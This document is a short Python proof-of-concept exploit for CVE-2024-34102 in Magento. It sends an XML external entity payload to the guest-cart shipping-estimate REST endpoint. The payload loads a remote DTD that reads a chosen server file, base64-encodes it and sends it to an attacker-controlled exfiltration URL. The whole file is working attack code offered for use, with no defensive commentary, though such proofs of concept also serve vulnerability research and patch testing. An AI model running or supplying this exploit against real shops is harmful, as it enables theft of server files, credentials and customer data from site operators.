PoC.py

import requests
import argparse

def exploit(target_url, target_file, exfil_url):
    headers = {
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "Content-Type": "application/json"
    }

    payload = {
        "address": {
            "totalsReader": {
                "collectorList": {
                    "totalCollector": {
                        "sourceData": {
                            "data": f"""<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://{exfil_url}/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r>""",
                            "options": 16
                        }
                    }
                }
            }
        }
    }

    dtd_content = f"""
    <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource={target_file}">
    <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://{exfil_url}?%data;'>">
    """

    try:
        # Send payload
        response = requests.post(f"{target_url}/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods", headers=headers, json=payload)
        
        if response.status_code == 200:
            print(f"[+] Payload sent successfully to {target_url}. Check {exfil_url} for exfiltrated data.")
        else:
            print(f"[-] Failed to send payload. HTTP Status Code: {response.status_code}")

    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit CVE-2024-34102 in Magento")
    parser.add_argument("--target-url", required=True, help="Target Magento URL")
    parser.add_argument("--target-file", required=True, help="File to exfiltrate from the target")
    parser.add_argument("--exfil-url", required=True, help="URL to receive exfiltrated data")
    
    args = parser.parse_args()

    exploit(args.target_url, args.target_file, args.exfil_url)